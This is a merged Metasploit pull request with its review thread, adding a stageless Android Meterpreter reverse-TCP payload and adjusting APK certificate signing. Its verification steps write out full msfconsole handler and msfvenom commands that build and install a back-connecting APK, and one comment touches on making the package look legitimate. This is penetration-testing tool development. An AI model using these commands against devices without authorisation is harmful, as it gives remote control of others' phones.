### PR TITLE
add android stageless meterpreter_reverse_tcp

### PR DESCRIPTION
**Pull request by timwr**
This pr adds a android/meterpreter_reverse_tcp payload.
I'll add android/meterpreter_reverse_http asap (I'm currently having issues with multiple sessions being reported).
## Verification

This PR requires the payload changes here: https://github.com/rapid7/metasploit-payloads/pull/118
- [x] Start a handler: 

```
./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 4444; set ExitOnSession false; run -j"
```
- [x] Create a stageless apk, install and run it:

```
./msfvenom -p android/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.apk
./tools/exploit/install_msf_apk.sh met.apk
```
- [x] **Verify** You get a working session
- [x] **Verify** You do not see 'sending stage' on new sessions

### CODE REVIEW

**Comment by busterb** [comment]
Looks like you need to run 'tools/modules/missing_payload_tests.rb' after doing an rspec run to integrate tests for the missing modules.

**Comment by timwr** [comment]
@busterb the tests are failing because this PR requires a new metasploit-payloads file here: https://github.com/rapid7/metasploit-payloads/pull/118/files#diff-0720d0ef1a41ea48060c3870d01bf936R153
I guess I need to build a new metasploit payload Gem and include it here?

**Comment by OJ** [comment]
Great stuff! Well done all.

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/075401d702f7c51bed0453978fe8453db4aaa808

**Comment by bcook-r7** [comment]
Cool stuff, release notes please @jmartin-r7 :)

File: lib/msf/core/handler/reverse_http.rb [hunk 1]
```diff
@@ -414,8 +414,6 @@ def on_request(cli, req)
         url = payload_uri(req) + conn_id
         url << '/' unless url[-1] == '/'
 
-        p url
```
Comment (wvu-r7) [inline lib/msf/core/handler/reverse_http.rb]: I blame @egypt.

Comment (OJ) [inline lib/msf/core/handler/reverse_http.rb]: Does does [blame](https://github.com/timwr/metasploit-framework/blame/master/lib/msf/core/handler/reverse_http.rb#L417)!
image

**Comment by jmartin-r7** [comment]
# Release Notes

Add support for android stageless reverse_tcp & reverse_http payloads.

**Comment by egypt** [comment]
I admit nothing. But that sounds like something I'd do

**Comment by OJ** [comment]
<3

**Comment by timwr** [comment]
thanks all :)

File: lib/msf/core/payload/android.rb [hunk 2]
```diff
@@ -31,25 +36,53 @@ def java_string(str)
...
 
-  def generate_cert
+  def sign_jar(jar)
     x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
+      "C=US/O=Android/CN=Android Debug"
+    )
+    key  = OpenSSL::PKey::RSA.new(2048)
```
Comment (adfoster-r7) [inline lib/msf/core/payload/android.rb]: Hey @timwr any context on the change from 1024 to 2048 here? Just noticed that it's considerably slower than 1024:

```
Time for 1024 PKey generation: 0.005687
Time for 2048 PKey generation: 0.150518
```

That's not a big issue, but on boot up we seem to generate a few android jars - so it all adds up to about a second of overhead. Any insight would be appreciated :+1:

Comment (jmartin-r7) [reply lib/msf/core/payload/android.rb]: Low certificate strength could be used as an indicator of compromised packaging, `2048` set in 2016 seems like an appropriate min key and soon even larger may be appropriate.

The cert being created on startup is a separate issue, possibly reducing how ofter a new cert is needed could be considered or making it a non-blocking task would likely be a valuable compromise.

Comment (timwr) [reply lib/msf/core/payload/android.rb]: @adfoster-r7 @jmartin-r7 I think I was just attempting to match the output of jarsigner. I don't think it makes much difference, and we can use jarsigner (and now apksigner) to resign the apk anyway. I suggest we reduce it to 1024 to increase the speed. I wonder if we could reduce it further by not generating the jar at all on startup.

Comment (adfoster-r7) [reply lib/msf/core/payload/android.rb]: Thanks for the extra insight - we'll have a PR up that hopefully makes this a bit faster 🤞 
I'll cross-reference that PR here for visibility too

Comment (adfoster-r7) [reply lib/msf/core/payload/android.rb]: Referencing - https://github.com/rapid7/metasploit-framework/pull/13148

**Pull request merged**